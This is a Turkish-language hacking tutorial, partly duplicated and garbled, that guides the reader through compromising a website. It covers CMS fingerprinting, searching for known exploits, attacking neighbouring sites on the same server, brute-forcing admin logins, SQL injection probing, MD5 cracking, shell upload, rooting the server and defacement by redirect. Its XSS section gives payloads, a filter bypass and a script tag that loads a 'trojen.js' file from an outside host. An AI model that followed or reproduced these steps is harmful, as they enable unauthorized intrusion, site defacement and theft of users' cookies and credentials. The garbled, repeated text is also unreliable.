Kısa Bir Sekılde Anlatacagım sizlere önce Hedef site http://www.xn--sitead-u9a.com/http://www.siteadı.com hedef site bu öncelikle ne yapmamız gerekli onu anlatacagım:
Oncelikle Hedef Sitenizi Tanımamız Gerekiyor...
Sitemiz Hangi Dilde Yazılmış? : Php,html,asp http://www.xn--sitead-u9a.com/index.asphttp://www.siteadı.com/index.asp yazdık acılmadı
http://www.xn--sitead-u9a.com/index.htmlhttp://www.siteadı.com/index.html yazdık acılmadı
http://www.xn--sitead-u9a.com/index.phphttp://www.siteadı.com/index.php Yazdık acıldı site dili php oldugunu ögrendık şimdide Özel Bir Scripti Var Mı yokmu ona bakacagız
vbulletin,mybb,smf,wordpresss,joomla
Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler veya Diğer Scriptlermi diye bakacagız.
kısa bir yol daha war
http://www.xn--sitead-u9a.com/robots.txthttp://www.siteadı.com/robots.txt yazdın genelde hazır sistem oldugunda admin girişini veriyor admin giriş bilgisinde ögrenebilirsiniz.
Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden Bulunmuş Açık Var Mı Ona Bakalım Bunu Öğenmek İçin Su Sitelerde Script Adını Aratacagız....
-- exploit-db.com
-- 1337day.com (Yeni Milw0rm)
En Popüler ve İlgi Gören Exploit Siteleri Buralardır...Bunlann Dışında Başka Sitelerde De Aratabilirsiniz
Burdan Güncel bir acık vermedı ozaman kendımız manuel arıyacagız...
Arayacağımız Muhtemel Açıklar ;
Cpnel Brute
Wordpres Brute
joomla brute
XSS Bugs
Sql Bugs
XSRF-CSRF Bugs
Rfi Bugs
Lfi Bugs
Upload Bugs
Html Injection Bugs vs güncel bildigim acıkları denıyoruz
site üzerinde odamı olmadı programlarla acık taratıyoruz acık arama programları ile bir acık acık yok ise site ozaman ne yapacagız serverdeki diger sitelerde acık arıyacagız nasılmı sitelerine hedef site veriyoruzhttp://www.xn--sitead-u9a.com/http://www.siteadı.com veriyoruz onlar cekıyor sıtelerı..
http://urltara.com/Aynı ip adresine sahip diğer siteler - Url Tara
http://www.yougetsignal.com/Network Tools by YouGetSignal.com
sitelerde taratıp serverdki siteleri tek tek denıyoruz bildigimiz Muhtemel Açıklar yöntemleri denıyoruz oda olamdı programla acık arıyoruz bir acık bulduk aradıgımız yöntemlerde verdi sql acıgı verdi md5 'e ulaşdık hemen kırmayı denıyoruz yapacagız googlede bir cok md5 cracker kırma onlıe siteler var ve bir cok perl pyhton dlinde kodlanmıs scpritler var orda kırabilirmisiniz ewet kırdık md5 panele daldık şimdi ne yapacagız..
Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ?
- Shell Upload Ediyoruz
shell yerse serverde bypas , config , forbin , root oluyoruz hedef siteye ulaşmak için ewet bypas vb gibi olamdı root oluyoruz gereklı kernel sürümünü bulup rootladık hedef siteye ulaşdık shellden sql baglanıp admın girişlerini degiştik ve hedef siteyi hackledık varsayalım shell yemıyor...
Shell yukleme Olmuyor Mu ?
- Hacklediğimiz Bir Siteye Yönlendirerek İndeximizi Açıyoruz Ama Nasıl ? Aşağıdaki
Kodu Ana Sayfadaki Bir Dökümana Ekleyerek..
>>>>KOD>>><**** http-equiv='*******" content="5;URL=http://www.yonleneceksite.com'>2 Sayısı Kaç Saniyede Sitemizin Açılacağını Ayarlar.
sql arama yöntemleri..
sql Açıklarını Tarayalım
Sql Bug Olması İçin Öncefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;
KOD : .php?id=
.asp?id=
.aspx?id=Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını Anlamak için ID Değerinin Sonuna 'a (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa Muhtemel acık Vardır...
Bu Takdirde Siteye Manuel Yada Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada acık arma programına veya sql acık arama programına Atabílirsiniz acık bulmaya calısırız..
Sonra Xss Açıklarını Tarıyalım
Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodlarını Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...
- O Güzel Javasaipt Kodumuz Bu ;
>>>> KOD>>>**********alert('archavin')</script>Nasıl yedireceğimize gelince:
- Yani Bu Şekilde ;
**********alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script> Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz...
KOD>>>
<script scr=http://cyberizm.org/trojen.js></script>
Oncelikle Hedef Sitenizi Tanımamız Gerekiyor...
Sitemiz Hangi Dilde Yazılmış? : Php,html,asp http://www.xn--sitead-u9a.com/index.asphttp://www.siteadı.com/index.asp yazdık acılmadı
http://www.xn--sitead-u9a.com/index.htmlhttp://www.siteadı.com/index.html yazdık acılmadı
http://www.xn--sitead-u9a.com/index.phphttp://www.siteadı.com/index.php Yazdık acıldı site dili php oldugunu ögrendık şimdide Özel Bir Scripti Var Mı yokmu ona bakacagız
vbulletin,mybb,smf,wordpresss,joomla
Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler veya Diğer Scriptlermi diye bakacagız.
kısa bir yol daha war
http://www.xn--sitead-u9a.com/robots.txthttp://www.siteadı.com/robots.txt yazdın genelde hazır sistem oldugunda admin girişini veriyor admin giriş bilgisinde ögrenebilirsiniz.
Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden Bulunmuş Açık Var Mı Ona Bakalım Bunu Öğenmek İçin Su Sitelerde Script Adını Aratacagız....
-- exploit-db.com
-- 1337day.com (Yeni Milw0rm)
En Popüler ve İlgi Gören Exploit Siteleri Buralardır...Bunlann Dışında Başka Sitelerde De Aratabilirsiniz
Burdan Güncel bir acık vermedı ozaman kendımız manuel arıyacagız...
Arayacağımız Muhtemel Açıklar ;
Cpnel Brute
Wordpres Brute
joomla brute
XSS Bugs
Sql Bugs
XSRF-CSRF Bugs
Rfi Bugs
Lfi Bugs
Upload Bugs
Html Injection Bugs vs güncel bildigim acıkları denıyoruz
site üzerinde odamı olmadı programlarla acık taratıyoruz acık arama programları ile bir acık acık yok ise site ozaman ne yapacagız serverdeki diger sitelerde acık arıyacagız nasılmı sitelerine hedef site veriyoruzhttp://www.xn--sitead-u9a.com/http://www.siteadı.com veriyoruz onlar cekıyor sıtelerı..
http://urltara.com/Aynı ip adresine sahip diğer siteler - Url Tara
http://www.yougetsignal.com/Network Tools by YouGetSignal.com
sitelerde taratıp serverdki siteleri tek tek denıyoruz bildigimiz Muhtemel Açıklar yöntemleri denıyoruz oda olamdı programla acık arıyoruz bir acık bulduk aradıgımız yöntemlerde verdi sql acıgı verdi md5 'e ulaşdık hemen kırmayı denıyoruz yapacagız googlede bir cok md5 cracker kırma onlıe siteler var ve bir cok perl pyhton dlinde kodlanmıs scpritler var orda kırabilirmisiniz ewet kırdık md5 panele daldık şimdi ne yapacagız..
Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ?
- Shell Upload Ediyoruz
shell yerse serverde bypas , config , forbin , root oluyoruz hedef siteye ulaşmak için ewet bypas vb gibi olamdı root oluyoruz gereklı kernel sürümünü bulup rootladık hedef siteye ulaşdık shellden sql baglanıp admın girişlerini degiştik ve hedef siteyi hackledık varsayalım shell yemıyor...
Shell yukleme Olmuyor Mu ?
- Hacklediğimiz Bir Siteye Yönlendirerek İndeximizi Açıyoruz Ama Nasıl ? Aşağıdaki
Kodu Ana Sayfadaki Bir Dökümana Ekleyerek..
>>>>KOD>>><**** http-equiv='*******" content="5;URL=http://www.yonleneceksite.com'>2 Sayısı Kaç Saniyede Sitemizin Açılacağını Ayarlar.
sql arama yöntemleri..
sql Açıklarını Tarayalım
Sql Bug Olması İçin Öncefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;
KOD : .php?id=
.asp?id=
.aspx?id=Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını Anlamak için ID Değerinin Sonuna 'a (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa Muhtemel acık Vardır...
Bu Takdirde Siteye Manuel Yada Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada acık arma programına veya sql acık arama programına Atabílirsiniz acık bulmaya calısırız..
Sonra Xss Açıklarını Tarıyalım
Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodlarını Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...
- O Güzel Javasaipt Kodumuz Bu ;
>>>> KOD>>>**********alert('archavin')</script>Nasıl yedireceğimize gelince:
- ID Değerlerinin Sonuna Ekleyip Enterlıyabiliriz Yada Search.php?q= Böyle Bir Değerin Sonuna Ekleyerek
- Enterlıyabiliriz...
- Bunu Char vb Algoritrııalarla Şifreleyerek De Girebifiriz...Bu Şekilde Filtrelerneyi De Aşmış Oluruz...
- Yani Bu Şekilde ;
**********alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script> Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz...
KOD>>>
<script scr=http://cyberizm.org/trojen.js></script>
- Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kirnlîk doğrulamayı sağlayan
- zayıf bileşenleridir. Saãdıgan eğer sayfayı ziyaret eden kullanıcılann Çerez bilgisini okuyup kaydedebilirse
- kendi bilgileri İle yerlerini değişlirerek kurbanın yetkilerine Ulaşabilir.Çerez Bilgisi Çalma Konusu
- Sitemizde Mevcuttur.
- Eğer Zekanızı Kullanırsanız Emin Olun Bu Yöntemle Hackleyemeyeceğiniz Site Yoktur.
- Güvenlik Zincirinin En Zayıf Halkası İnsandır.Bir Zincirin Halkalarından Birinin Kopması, Zincirin
- Parçalanmasına Yeter. Bunu Dünyanın En İyi Sosyal Mühendislikci Hackerı Söylemiştir Benimde Foveri Sözümdür